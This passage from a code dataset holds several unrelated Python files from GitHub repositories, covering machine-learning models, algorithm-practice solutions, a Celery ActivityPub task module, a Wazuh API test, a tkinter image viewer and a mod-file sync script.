__future__ import division, absolute_import\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\nimport numpy as np\n\n\n\ndef gen_conv_encoder(encoder_para):\n    '''\n    generate a one layer convolutional encoder\n\n    @encoder_para: dict, parameters of method, including:\n        @@img_size: np.ndarray, shape=[4:], the size of input image\n        @@kernal_size: np.ndarray, shape=[4:], [width, height, input_channel, output_channel]\n        @@strides: np.ndarray, shape=[4:], [batch_stride, width_stride, height_stride, channel_stride]\n    '''\n\n    img_size = encoder_para['img_size']\n    kernal_size = encoder_para['kernal_size']\n    strides = encoder_para['strides']\n\n    # generate X and weight\n    X = tf.placeholder(tf.float32, img_size) #batch_size, img_width, img_height, channel\n    enc_knl = tf.get_variable(\"enc_knl\", shape=kernal_size, \\\n        initializer=layers.xavier_initializer_conv2d())\n    enc_b = tf.Variable(tf.zeros([kernal_size[-1]], dtype=tf.float32))\n    #generate conv layer\n    conv_layer = tf.nn.conv2d(X, enc_knl, strides, padding='SAME')\n    conv_layer = tf.nn.relu(tf.nn.bias_add(conv_layer, enc_b))\n    return conv_layer, X\n\ndef gen_conv_decoder(X, decoder_para):\n    '''\n    generate a one layer deconvolutional decoder\n\n    @X: input data\n    @decoder_para: dict, parameters of method, including:\n        @@kernal_size: list, shape=[4:], [width, height, input_channel, output_channel]\n        @@strides: list, shape=[4:], [batch_stride, width_stride, height_stride, channel_stride]\n        @@output_size: list, shape=[4:], [batch, width, height, channel]\n    '''\n\n    # generate input and weight\n    kernal_size = decoder_para['kernal_size']\n    strides = decoder_para['strides']\n    output_size = decoder_para['output_size']\n\n    dec_knl = tf.get_variable(\"dec_knl\", shape=kernal_size, \\\n        initializer=layers.xavier_initializer_conv2d())\n    dec_b = tf.Variable(tf.zeros([kernal_size[-1]], dtype=tf.float32))\n    # generate deconvolutional layer\n    deconv_layer = tf.nn.conv2d_transpose(X, dec_knl, tf.stack(output_size), strides=strides, padding='SAME')\n    deconv_layer = tf.nn.relu(tf.add(deconv_layer, dec_b))\n    return deconv_layer\n\n\n\n\n    \n\n\n","repo_name":"deadoggy/PatternRecognitionAssignments","sub_path":"FinalProj/sourcecode/EncDec/Conv_EncDec.py","file_name":"Conv_EncDec.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73727517492","text":"from itertools import permutations\n\nn = int(input())\nplanets = []\n\n\nclass Planet:\n    def __init__(self, idx, x, y, z):\n        self.idx = idx\n        self.x = x\n        self.y = y\n        self.z = z\n\n    def __getitem__(self, axis):\n        # expose the coordinates positionally so the sort keys and\n        # get_min_distance below can index a Planet like an (x, y, z) tuple\n        return (self.x, self.y, self.z)[axis]\n\n\ndef get_min_distance(planet1, planet2):\n    return min(\n        abs(planet1[0] - planet2[0]),\n        abs(planet1[1] - planet2[1]),\n        abs(planet1[2] - planet2[2])\n    )\n\n\nfor i in range(n):\n    x, y, z = map(int, input().split(' '))\n    planets.append(Planet(i, x, y, z))\n\nanswer = float('inf')\nfor p in list(permutations([0, 1, 2], 3)):\n    i, j, k = p\n    sorted_planets = sorted(planets, key=lambda x: (x[i], x[j], x[k]))\n    print(sorted_planets)\n    dist = 0\n    for idx in range(n-1):\n        dist += get_min_distance(sorted_planets[idx], sorted_planets[idx+1])\n\n    answer = min(answer, dist)\n\nprint(answer)","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/2887_행성이동(미).py","file_name":"2887_행성이동(미).py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"39322721763","text":"\"\"\" Run CXR segmentation - heart\n\nUsage:\n    run_segment.py <image_dir> <mask_dir> <model_path> 
[--dataframe=DF] [--target=TARGET] [--split=SPLIT] [--checkFiles] [--trueDir=TD] [--cleanIso] [--output_df=DF] [--color] [--invert]\n run_segment.py (-h | --help)\nExamples:\n train_unet.py /path/to/data/frame.csv /path/to/images /path/to/write/output/model.pth\nOptions:\n -h --help Show this screen.\n --dataframe=DF Optional data frame to select which images are of interest [default: None]\n --target=TARGET If optional df is specified, then need to include the target variable [default: None]\n --split=SPLIT If split, then split on the Dataset column keeping only the Te values [default: False]\n --checkFiles Should we check whether df files actually exist?\n --trueDir=TD Directory of ground-truth masks [Default:None]\n --cleanIso Should we clean isolated samples?\n --output_df=DF Output dataframe to file? [Default:None]\n --color Are the masks in color?\n --invert Does the mask need to be inverted?\n\"\"\"\n\n\n\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\nfrom docopt import docopt\nimport pandas as pd\nimport fastai\nfrom fastai.vision import *\nimport pretrainedmodels\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom sklearn.metrics import *\nfrom fastai.callbacks import *\nimport math\nimport time\n\nfrom SegmentationUtils import SegmentationDataset\nfrom SegmentationUtils import SegmentationModel\nfrom SegmentationUtils import SoftDiceLoss\n\nfrom torchvision.utils import save_image\n\nfrom unet_model import UNet\nimport cv2\nfrom scipy.ndimage import label, generate_binary_structure\n\n\ntfms_test = get_transforms(do_flip = False,max_warp = None,max_rotate=0.0,max_zoom=1.0,max_lighting=0.0)\ntfms = get_transforms(do_flip = False, \nmax_rotate = 5.0, max_zoom = 1.2, max_lighting=0.5,max_warp = None)\nnum_workers = 8\nbs = 64\nsize = 320\ncont_thresh = 50\nthresh = 1\n\n\ndef DICE(im1,im2):\n im1 = np.asarray(im1).astype(np.bool)\n im2 = np.asarray(im2).astype(np.bool)\n\n if im1.shape != im2.shape:\n raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n # Compute Dice coefficient\n intersection = np.logical_and(im1, im2)\n\n return 2. 
* intersection.sum() / (im1.sum() + im2.sum())\n\nif __name__ == '__main__':\n\n arguments = docopt(__doc__)\n \n ##Grab image directory\n image_dir = arguments['<image_dir>']\n mask_dir = arguments['<mask_dir>']\n if(not os.path.exists(mask_dir)):\n os.mkdir(mask_dir)\n \n if(arguments['--dataframe']==\"None\"):\n files = [f for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir,f))] \n ###Results\n output_df = pd.DataFrame(columns = ['File','Dummy','Prediction'])\n \n output_df['File'] = files\n output_df['Dummy'] = np.random.random_sample(len(files))\n col = 'Dummy'\n else:\n output_df = pd.read_csv(arguments['--dataframe'])\n locs = []\n if(arguments['--checkFiles']):\n for i in range(0,output_df.shape[0]):\n if(os.path.exists(os.path.join(image_dir,output_df.iloc[i,0]))):\n locs.append(i)\n else:\n print(output_df.iloc[i,0])\n output_df = output_df.iloc[locs,:]\n \n output_df = output_df.reset_index(drop=True) \n col = arguments['--target']\n \n if(arguments[\"--split\"]!=\"False\"):\n output_df = output_df[output_df.Dataset==\"Te\"]\n \n\n \n ###Path to output model\n model_path = arguments['<model_path>'] \n\n \n\n imgs = (ImageList.from_df(df=output_df,path=image_dir)\n .split_none()\n #.split_by_idx(valid_idx)\n .label_from_df(cols=col)\n .databunch(num_workers = num_workers,bs=bs))\n \n\n model = UNet(3,1,bilinear=False)\n if(arguments['--color']):\n model = UNet(3,3)\n\n \n learn = Learner(imgs, model)\n \n learn.load(arguments['<model_path>'])\n learn.model.eval()\n learn.model.cuda()\n\n all_dice = []\n all_roc = []\n \n #import pdb; pdb.set_trace()\n pbar = progress_bar(range(output_df.shape[0]))\n for i in pbar:\n #import pdb; pdb.set_trace()\n curr = open_image(os.path.join(image_dir,output_df.iloc[i,0]))\n curr = curr.apply_tfms(tfms_test[0],size=size,do_resolve=False).px \n mask = learn.model(curr.view(1,3,size,size).cuda())\n \n\n if(arguments['--color']):\n mask = torch.round(mask*thresh)\n save_image(mask.view(3,size,size).detach().cpu(),os.path.join(mask_dir,output_df.iloc[i,0]))\n else:\n\n\n if(arguments['--invert']):\n mask = torch.round(mask*thresh)\n else:\n mask = 1-torch.round(mask*thresh)\n #mask = 1-torch.round(mask)\n #kernel = np.ones((5,5),np.uint8)\n #erosion = cv2.erode(img,kernel,iterations = 1)\n #remove random dots - MORPH_CLOSE to fill in blanks\n #opening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\n mask = torch.mode(mask,dim=1)\n #import pdb; pdb.set_trace()\n #img = mask.values.data.cpu().numpy()\n #kernel = np.ones((3,3),np.uint8)\n #opening = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel)\n #mask = torch.Tensor(opening)\n tmp = mask.values.cpu().detach().numpy()\n mask_for_dice = 1-tmp\n #import pdb; pdb.set_trace()\n if(arguments['--cleanIso']):\n arr,nf = label(tmp)\n unique,counts = np.unique(arr.flatten(),return_counts=True)\n lbls_keep = unique[counts < cont_thresh]\n tmp[np.isin(arr,lbls_keep)] = 0\n mask = torch.Tensor(tmp)\n else:\n mask = mask.values.cpu().detach()\n\n mask = mask.repeat(1,3,1,1)\n \n \n mask = 1 - mask\n mask = mask*curr.view(1,3,size,size)\n \n #Need to apply mask\n \n save_image(mask.view(3,size,size).detach().cpu(),os.path.join(mask_dir,output_df.iloc[i,0]))\n #import pdb; pdb.set_trace()\n #Add DICE score for to output df \n if(not arguments['--trueDir'] is None and arguments['--trueDir']!=\"None\" ):\n\n #Load ground truth mask\n curr2 = open_image(os.path.join(arguments['--trueDir'],output_df.iloc[i,0]))\n curr2 = curr2.apply_tfms(tfms_test[0],size=size,do_resolve=False).px\n curr2 = torch.round(curr2)\n curr2 = torch.mode(curr2,dim=0)\n tmp = curr2.values.cpu().detach().numpy()\n \n #Calculate intersection/union against predicted mask\n curr_dice = DICE(tmp,mask_for_dice[0,:,:])\n \n #Calculate roc AUC\n curr_roc = roc_auc_score(tmp.flatten(),mask_for_dice[0,:,:].flatten())\n #import pdb; pdb.set_trace()\n\n #Add to vector\n all_dice.append(curr_dice)\n all_roc.append(curr_roc)\n\n if(arguments['--output_df']!=\"None\"):\n output_df['DICE'] = pd.Series(all_dice)\n output_df['ROC'] = pd.Series(all_roc)\n output_df.to_csv(arguments['--output_df'])\n \n\n \n \n","repo_name":"vineet1992/Retina-Seg","sub_path":"Code/run_segment.py","file_name":"run_segment.py","file_ext":"py","file_size_in_byte":7580,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"31189334607","text":"#\n# @lc app=leetcode.cn id=179 lang=python3\n#\n# [179] Largest Number\n#\n\n# @lc code=start\nclass Solution:\n def largestNumber(self, nums) -> str:\n n = len(nums)\n if n == 1:\n return str(nums[0])\n if set(nums) == {0}:\n return '0'\n def sort_key(a, b): # a < b ? then a comes first and b second; otherwise b first and a second\n p1 = a * 10**(len(str(b))) + b # a first, then b\n p2 = b * 10**(len(str(a))) + a\n if p1 < p2: # ascending\n return -1\n elif p1 > p2: # descending\n return 1\n else:\n return 0 \n from functools import cmp_to_key\n nums.sort(key=cmp_to_key(sort_key), reverse=True)\n # Normally the key function converts each list element into a key and comparison happens on the keys;\n # here we pass a comparison function instead, so cmp_to_key is needed to turn it into a key function.\n res = ''.join([str(i) for i in nums])\n return res\n \n\n# nums = [3,30,34,345,5,9]\n# s = Solution().largestNumber(nums)\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"179.最大数.py","file_name":"179.最大数.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2655821251","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def __init__(self):\n self.valid_paths = []\n\n def stackPathSum(self, root: TreeNode, targetSum: int) -> List[List[int]]:\n \"\"\"\n Runtime: 44 ms, faster than 76.98% of Python3 online submissions.\n Memory Usage: 15.1 MB, less than 97.78% of Python3 online submissions.\n \"\"\"\n if not root:\n return []\n else:\n solution = []\n stack = [(0, root, [])]\n\n while stack:\n cur_sum, node, cur_path = stack.pop()\n cur_sum += node.val\n cur_path.append(node.val)\n\n # Reached target and is a leaf!\n if cur_sum == targetSum and not node.left and not node.right:\n solution.append(cur_path[:])\n # Haven't reached target yet, keep exploring\n else:\n if node.right:\n stack.append((cur_sum, node.right, cur_path[:]))\n if (\n node.left\n ): # since popping from the end, we do left *after* right\n stack.append((cur_sum, node.left, cur_path[:]))\n\n return solution\n\n def recursivePathSum(\n self, root: TreeNode, targetSum: int, _sum=0, path=None\n ) -> List[List[int]]:\n \"\"\"\n Need to be careful with lists - identical code with path = [] led to bugs.\n\n Runtime: 52 ms, faster than 29.51% of Python3 online submissions.\n Memory Usage: 20 MB, less than 5.23% of Python3 online submissions.\n \"\"\"\n if root:\n if not path:\n path = []\n path.append(root.val)\n _sum += root.val\n\n if _sum == targetSum and not root.left and not root.right:\n self.valid_paths.append(path.copy())\n\n if root.left:\n self.recursivePathSum(root.left, targetSum, _sum, path.copy())\n\n if root.right:\n self.recursivePathSum(root.right, targetSum, _sum, path.copy())\n\n return self.valid_paths\n","repo_name":"IAjimi/Leetcode","sub_path":"113_Path_Sum_II.py","file_name":"113_Path_Sum_II.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10772597663","text":"import numpy as np\n\n\nclass BurstyBinarySymmetricChannel:\n def __init__(self, burst_probability: float, burst_length: int) -> None:\n \"\"\"Construct a bursty binary symmetric channel. This channel introduces burst\n errors of burst_length bits with a probability of burst_probability. Note that\n this is NOT a channel model from the literature. However, similar channel models\n exist. See bursty binary noise channels.\n\n Args:\n burst_probability:\n The probability of a burst error occurring at any particular location.\n burst_length:\n The length of burst errors to generate. Each burst error will originate\n from a particular location and continue for burst_length bits.\n \"\"\"\n\n assert 0 <= burst_probability <= 1\n assert burst_length > 0\n\n self._distribution = [1 - burst_probability, burst_probability]\n self._burst_length = burst_length\n\n def transform(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Introduce burst errors into the data.\n\n Args:\n data:\n The array of bits to introduce burst errors to. The behavior of this\n method is undefined on arrays that contain elements other than 0 and 1.\n\n Return: The data with burst errors.\n \"\"\"\n\n assert data.size > self._burst_length\n\n # Convert the data to the appropriate data type.\n data = data.astype(np.uint8, copy=False)\n\n # Iterate starting from indices outside of the data. This accounts for burst\n # errors originating outside of the current message that could still impact\n # the current message.\n for i in range(-self._burst_length + 1, data.size):\n\n # Check if we should introduce a burst error.\n if not np.random.choice((0, 1), p=self._distribution):\n continue\n\n # Introduce burst error. The slice end is exclusive, so clamp to\n # data.size rather than data.size - 1 or the final bit can never flip.\n l = max(i, 0)\n r = min(data.size, i + self._burst_length)\n data[l:r] ^= 1\n\n return data\n","repo_name":"SupurCalvinHiggins/ml-eec-decoder","sub_path":"channels/src/bursty_binary_symmetric_channel.py","file_name":"bursty_binary_symmetric_channel.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"74534180532","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom collections import OrderedDict\nimport requests\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom pprint import pformat\n\nfrom fediverse.models import Post, User\nfrom fediverse.lib import sign_header, addDefaultHeader\n\n# resource: https://dot-blog.jp/news/django-async-celery-redis-mac/\n@shared_task(max_retries=10, default_retry_delay=60)\ndef APSend(targetUrl, fromUser, dct):\n dctOD = OrderedDict(**dct)\n dctOD['@context'] = [\n \"https://www.w3.org/ns/activitystreams\",\n \"https://w3id.org/security/v1\"\n ]\n dctOD.move_to_end('@context', False)\n logging.info(f\"APSEND => {targetUrl}\")\n logging.info(\"APBODY: \")\n logging.info(pformat(dict(dctOD)))\n try:\n res = requests.post(\n targetUrl,\n json=dict(dctOD),\n auth=sign_header(fromUser),\n headers=addDefaultHeader()\n )\n res.raise_for_status()\n except:\n logging.warning(\"APSend failed; it will be retried.\")\n raise APSend.retry()\n return res.status_code\n\n@shared_task\ndef AccountDeletion(username):\n try:\n target = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n logging.error(\"Target username not found.\")\n raise ValueError(\"Target username not found.\")\n\n target.posts.all().delete()\n target.following.all().delete()\n target.followers.all().delete()\n target.liked.all().delete()\n target.blocking.all().delete()\n target.blocked.all().delete()\n \n return True\n","repo_name":"YuzuRyo61/CrossPlan","sub_path":"CrossPlan/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
+{"seq_id":"18380961301","text":"import json\n\nimport pytest\nimport requests\nfrom wazuh_testing import api\n\n# Marks\npytestmark = [pytest.mark.server]\n\n\n# Tests\n\n@pytest.mark.parametrize(\n 'method, endpoint_url, json_body, use_login_token, expected_status_code, expected_response_text', [\n ('POST', '/agents', {\"wrong_key\": \"val\"}, True, 400,\n {'title': 'Bad Request', 'detail': \"'name' is a required property\"}),\n ('GET', '/not_found_endpoint', None, True, 404,\n {'title': 'Not Found', 'detail': '404: Not Found'}),\n ('GET', '/agents', None, False, 401,\n {'title': 'Unauthorized', 'detail': 'No authorization token provided'}),\n ('POST', '/security/user/authenticate', None, False, 401,\n {'title': 'Unauthorized', 'detail': 'Invalid credentials'})\n ])\n@pytest.mark.filterwarnings('ignore::urllib3.exceptions.InsecureRequestWarning')\ndef test_response_postprocessing(restart_api_module, get_api_details, method, endpoint_url, json_body, use_login_token,\n expected_status_code, expected_response_text):\n '''\n description: Check if the response_postprocessing API middleware works.\n\n wazuh_min_version: 4.0.0\n\n tier: 0\n\n parameters:\n - get_api_details:\n type: fixture\n brief: Get API information.\n - method:\n type: str\n brief: Method used in the API request.\n - endpoint_url:\n type: str\n brief: Endpoint requested in the test.\n - json_body:\n type: dict\n brief: JSON body used in POST API requests.\n - use_login_token:\n type: bool\n brief: Variable used to determine whether a login token for the API request is needed or not.\n - expected_status_code:\n type: int\n brief: Status code expected in the API response.\n - expected_response_text:\n type: dict\n brief: Dictionary representing the expected API response text.\n\n assertions:\n - Verify that the fields are the expected ones when getting a 400 status code response (bad request).\n - Verify that the fields are the expected ones when getting a 404 status code response (not found).\n - Verify that the details are the expected ones when getting a 401 status code response (unauthorized).\n - Verify that the details are the expected ones when getting a 401 status code response (invalid credentials).\n\n tags:\n - headers\n - security\n '''\n api_details = get_api_details()\n headers = api_details['auth_headers'] if use_login_token else api.get_login_headers('wrong_user', 'wrong_password')\n\n # Make an API request\n response = getattr(requests, method.lower())(f\"{api_details['base_url']}{endpoint_url}\", headers=headers,\n verify=False, json=json_body)\n\n assert response.headers['Content-Type'] == 'application/problem+json; charset=utf-8'\n assert response.status_code == expected_status_code\n assert json.loads(response.text) == expected_response_text # type and 
status keys deleted\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_api/test_middlewares/test_response_postprocessing.py","file_name":"test_response_postprocessing.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"30662401172","text":"from tkinter import *\r\nfrom functools import partial\r\nimport tkinter as tk\r\nfrom PIL import Image, ImageTk\r\nimport math, os\r\nfrom PixInfo import PixInfo\r\n\r\n\r\nclass test(Frame) :\r\n\r\n # Constructor.\r\n def __init__(self, master, pixInfo):\r\n Frame.__init__(self, master)\r\n self.master = master\r\n self.pixInfo = pixInfo\r\n self.colorCode = pixInfo.get_colorCode()\r\n self.intenCode = pixInfo.get_intenCode()\r\n # Full-sized images.\r\n self.imageList = pixInfo.get_imageList()\r\n # Thumbnail sized images.\r\n self.photoList = pixInfo.get_photoList()\r\n # Image size for formatting.\r\n self.xmax = pixInfo.get_xmax()\r\n self.ymax = pixInfo.get_ymax()\r\n global count\r\n self.count = 0\r\n\r\n # Create Main frame.\r\n mainFrame = Frame(master)\r\n mainFrame.pack()\r\n\r\n # Create Picture chooser frame.\r\n listFrame = Frame(mainFrame, width=300)\r\n listFrame.pack(side=BOTTOM,fill= X,expand=True)\r\n\r\n # Create Control frame.\r\n controlFrame = Frame(mainFrame)\r\n controlFrame.pack(side=RIGHT)\r\n\r\n # Create Preview frame.\r\n previewFrame = Frame(mainFrame,\r\n width=self.xmax + 45, height=self.ymax)\r\n previewFrame.pack_propagate(0)\r\n previewFrame.pack(side=LEFT)\r\n\r\n def nextPage():\r\n print(self.count)\r\n if self.count != 100:\r\n for widgets in listFrame.winfo_children():\r\n widgets.destroy()\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked, self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i + 1, column=j + 1)\r\n self.count += 1\r\n\r\n def previousPage():\r\n print(\"before\", self.count)\r\n self.count -= 20\r\n\r\n print(\"after\", self.count)\r\n if (self.count > 0):\r\n self.count -= 20\r\n for widgets in listFrame.winfo_children():\r\n widgets.destroy()\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked, self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i + 1, column=j + 1)\r\n self.count += 1\r\n else:\r\n self.count += 20\r\n\r\n # Layout Controls.\r\n previousBtn = Button(controlFrame, text=\"previous page\",\r\n command=partial(previousPage))\r\n previousBtn.grid(row=1, column=1)\r\n\r\n nextPageBtn = Button(controlFrame, text=\"next page\",\r\n command=partial(nextPage))\r\n nextPageBtn.grid(row=1, column=2)\r\n\r\n\r\n\r\n #########################################\r\n # Layout Picture ListBox in images\r\n\r\n def buttonClicked(idx):\r\n print(idx)\r\n\r\n # for i in range(len(self.imageList)):\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked,self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i+1, column=j + 1)\r\n self.count+=1\r\n\r\n\r\n\r\n\r\n\r\n\r\n ##########################################\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n root = Tk()\r\n root.title('Image Analysis 
Tool')\r\n\r\n # resultWin = Toplevel(root)\r\n # resultWin.title('Result Viewer')\r\n # resultWin.protocol('WM_DELETE_WINDOW', lambda: None)\r\n\r\n pixInfo = PixInfo(root)\r\n\r\n test = test(root, pixInfo)\r\n\r\n\r\n root.mainloop()","repo_name":"yuyol/multimediaProject","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11773100212","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author: Donny You(youansheng@gmail.com)\n# Pose Estimation running score.\n\n\nimport numpy as np\n\n\nclass PoseRunningScore(object):\n def __init__(self, configer):\n self.configer = configer\n self.oks_all = np.zeros(0)\n self.oks_num = 0\n\n def compute_oks(self, gt_kpts, pred_kpts):\n \"\"\"Compute oks matrix (size gtN*pN).\"\"\"\n gt_count = len(gt_kpts)\n pred_count = len(pred_kpts)\n oks = np.zeros((gt_count, pred_count))\n if pred_count == 0:\n return oks.T\n\n # for every human keypoint annotation\n for i in range(gt_count):\n anno_keypoints = np.reshape(np.array(gt_kpts[i]), (self.configer.get('data', 'num_keypoints'), 3))\n visible = anno_keypoints[:, 2] == 1\n # scale: squared max of the keypoints' x-range and y-range\n scale = max(np.max(anno_keypoints[:, 0]) - np.min(anno_keypoints[:, 0]),\n np.max(anno_keypoints[:, 1]) - np.min(anno_keypoints[:, 1])) ** 2 + 1e-8\n\n if np.sum(visible) == 0:\n for j in range(pred_count):\n oks[i, j] = 0\n else:\n # for every predicted human\n for j in range(pred_count):\n predict_keypoints = np.reshape(np.array(pred_kpts[j]),\n (self.configer.get('data', 'num_keypoints'), 3))\n dis = np.sum((anno_keypoints[visible, :2] - predict_keypoints[visible, :2]) ** 2, axis=1)\n oks[i, j] = np.mean(\n np.exp(-dis / 2 / self.configer.get('details', 'delta')[visible] ** 2 / (scale + 1))\n )\n\n return oks\n\n def update(self, batch_pred_kpts, batch_gt_kpts):\n \"\"\"Evaluate predicted_file and return mAP.\"\"\"\n # Construct set to speed up id searching.\n # for every annotation in our test/validation set\n for i in range(len(batch_pred_kpts)):\n # if the image in the predictions, then compute oks\n oks = self.compute_oks(batch_gt_kpts[i], batch_pred_kpts[i])\n # view pairs with max OKSs as match ones, add to oks_all\n self.oks_all = np.concatenate((self.oks_all, np.max(oks, axis=1)), axis=0)\n # accumulate total num by max(gtN,pN)\n self.oks_num += np.max(oks.shape)\n\n def get_mAP(self):\n # compute mAP by APs under different oks thresholds\n average_precision = []\n for threshold in np.linspace(0.5, 0.95, 10):\n average_precision.append(np.sum(self.oks_all > threshold) / np.float32(self.oks_num))\n\n return np.mean(average_precision)\n\n def reset(self):\n self.oks_all = np.zeros(0)\n self.oks_num = 0\n\n","repo_name":"donnyyou/torchcv","sub_path":"metric/pose/pose_running_score.py","file_name":"pose_running_score.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"}
+{"seq_id":"18041077112","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow_text import SentencepieceTokenizer\nimport globals\n\nclass Embedder:\n def _download_embedding_model(self):\n # universal sentence encoder model\n moduleUrl = 'https://tfhub.dev/google/universal-sentence-encoder-multilingual/3'\n print(\"Loading module url\")\n self.embeddingModel = hub.load(moduleUrl)\n print(\"Module url loaded\")\n\n def __init__(self):\n self._download_embedding_model()\n \n def 
getSentenceEmbedding(self, sentence: str) -> list[float]:\n self.embeddingCounter = self.embeddingCounter + 1\n globals.guiHandler.printProgress(self.embeddingCounter, self.numOfSentences)\n return self.embeddingModel(sentence)\n \n def getSentenceListEmbedding(self, sentenceList: list[str]) -> list[list[float]]:\n self.embeddingCounter = 0\n self.numOfSentences = len(sentenceList)\n return list(map(self.getSentenceEmbedding, sentenceList))\n \n def getEmbedDistance(self, embeddingA: list[float], embeddingB: list[float]) -> float:\n distance = tf.sqrt(tf.reduce_sum(tf.square(embeddingA - embeddingB)))\n return distance.numpy()\n \nsupportedLanguages = [\"ar\", \"zh-CN\", \"zh-TW\", \"en\", \"fr\", \"de\",\n \"it\", \"ja\", \"ko\", \"nl\", \"pl\", \"pt\", \"es\",\n \"th\", \"tr\", \"ru\"]\n \n ","repo_name":"Classic-Daniel/BilingualBookGenerator","sub_path":"embedding/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21708130921","text":"# Copyright 2020 June Hanabi\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n# This installs, updates, and removes package files in the projects folder to match the assets folder\r\nimport fnmatch\r\n\r\nimport os\r\nimport shutil\r\nfrom settings import assets_path, mods_folder, creator_name, project_name, build_path\r\nfrom Utility.helpers_path import ensure_path_created, remove_file\r\n\r\nmod_name_folder_path = mods_folder + os.sep + creator_name + \"_\" + project_name\r\n\r\nensure_path_created(mod_name_folder_path)\r\nfile_list_failed = []\r\n\r\n\r\ndef remove_tl_packages(path: str) -> int:\r\n count = 0\r\n\r\n # Remove existing package files\r\n for root, dirs, files in os.walk(path):\r\n for filename in fnmatch.filter(files, \"*.package\"):\r\n remove_file(root + os.sep + filename)\r\n count+=1\r\n\r\n # Only cover the top-level folder\r\n break\r\n return count\r\n\r\n\r\ndef copy_tl_packages(src: str, dest: str) -> int:\r\n count = 0\r\n\r\n # Copy new package files\r\n for root, dirs, files in os.walk(src):\r\n for filename in fnmatch.filter(files, \"*.package\"):\r\n try:\r\n shutil.copy(root + os.sep + filename,\r\n dest + os.sep + filename)\r\n count += 1\r\n except:\r\n file_list_failed.append(root + os.sep + filename)\r\n\r\n # Only cover the top-level folder\r\n break\r\n\r\n return count\r\n\r\n\r\nfiles_removed = remove_tl_packages(mod_name_folder_path)\r\nremove_tl_packages(build_path)\r\n\r\nfiles_added = copy_tl_packages(assets_path, mod_name_folder_path)\r\ncopy_tl_packages(assets_path, build_path)\r\n\r\nfile_difference = files_added - files_removed\r\n\r\nprint(\"Synced packages:\" +\r\n \" +\" + str(files_added) +\r\n \" -\" + str(files_removed) +\r\n \" ~\" + str(file_difference))\r\n\r\nif len(file_list_failed) > 0:\r\n print(\"\")\r\n print(\"Failed to copy these files, make sure the packages are named uniquely\")\r\n print(\"\")\r\n 
